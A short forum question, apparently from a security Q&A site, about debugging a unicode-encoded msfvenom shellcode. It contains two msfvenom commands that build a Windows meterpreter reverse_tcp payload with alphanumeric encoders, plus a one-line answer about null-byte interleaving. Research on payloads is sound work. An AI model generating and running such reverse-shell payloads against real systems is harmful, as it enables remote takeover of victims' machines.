shellcodemetasploit

Debug unicode msfvenom payload


I'd like to debug some msfvenom generated payload. I'm perfectly able to do it, when I generate the payload with "standard" encoding in this way:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX

In this case, I can get the resulting payload, use something like Blobrunner and I'm ready to go.

If I generate a shellcode with unicode encoding

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX

The same is not working: I get a lot of duplicated/invalid instructions when I process the shellcode. This make sense because I guess I'm managing it as normal encoding. But how can I debug this shellcode? Any tool to convert it to a "valid" sequence removing the "unicode padding"?

Thanks a lot!


Solution

  • I think I got it: it's just a matter of adding an interleave with 00 between bytes...easy...don't know why I missed it before...